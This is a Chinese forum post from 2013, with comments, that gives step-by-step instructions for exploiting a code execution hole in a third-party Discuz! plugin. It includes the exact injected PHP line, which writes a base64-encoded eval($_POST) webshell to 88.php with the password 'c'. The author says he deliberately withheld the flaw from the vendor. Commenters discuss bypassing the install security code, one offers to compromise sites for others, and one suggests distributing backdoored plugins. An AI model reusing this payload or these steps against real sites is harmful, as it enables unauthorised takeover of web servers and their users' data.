具体哪些版本存在漏洞,自己测试,只要能安装这个插件的,就能拿到shell,这个已经在手里 很久了,但是使用其拿shell,也没几次,没事写出来,大家乐乐,别忘记感谢。
这个方法,就是需要 zend 支持【插件zend加密】,当然我还有一个不需要ZEND支持的,都是 app第三方的插件问题。
下面我来说说过程吧!
1.安装 zend 权限检查插件,因为后面利用到的插件是zend加密的,只要装了这个插件,后面的插件才能正常安装!
http://addon.discuz.com/?@study_zendcheck.pack
2.安装雨哲关于我们单页插件。 【[i][/i]ps:雨哲的好几个插件都有这个代码执行漏洞,自己发掘~!】
3.页面管理,随便编辑一个页面,注意到了吧,没错,任意代码执行,下面我们就让生成一个小马
我插入:
fputs(fopen('88.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));
然后我提交!
4.保存好后,我们点预览刚才编辑的页面,如图:
5.来看看我们的成果,会在根目录下面生成:88.php 密码为:c
无图无真相,翠花上图:
本来想先通知厂家的,厂家一下下架了,大家就没得玩了,所以就放在技术社区里面,大家觉得能用上,也点 感谢 下。
还有一个不需要 zend权限的插件,能直接上传任何后缀名的文件,看感谢情况而定,是否发出。
还有 Discuz!NT 高版本 rss.aspx 不能编辑的情况下,进入后台后 拿shell 的办法。这次就不说了!
[原文地址]
相关讨论:
11#
木易耳朵 | 2013-07-21 00:23
安装插件需要有安全码啊。不通用。即使你的账户是创始人,没有安全码你也不能安装插件。
12#
江南的鱼 | 2013-07-21 00:36
自己有没测试,安全码是在论坛端还是在插件端设置的?为毛我试了好多都没要安全码?我本地下载安装也没有安全码,如果是在dz官方插件注册用户绑定了域名,这个域名对应一个帐号,而没绑定域名的可以不要安全码安装,我想改下host文件就绕过了,当然要看这个安全码是哪个了,请说明安全码是哪来的,怎么设置的,才能想到绕过的办法
14#
木易耳朵 | 2013-07-21 08:45
@江南的鱼 我日的一个企业大客户版,就是官方报价几十万的那种。安装插件是要确认安全码的。这个安全码可以重设,但是要在网站目录上传一个txt验证文件后才可以重新设置。
16#
苦战 | 2013-07-21 10:05
不通用 安全码是硬伤 不解释
17#
debug | 2013-07-21 10:47
哈哈 还有几个插件也是。。。 拿着很久了
18#
江南的鱼 | 2013-07-21 11:01
@木易耳朵 如果需要,可以联系我帮你拿shell
20#
Yaseng (看黄片 到 www.yaseng.me) | 2013-07-21 13:51
我会说 可以自己提交带后门的插件玩玩
留言评论(旧系统):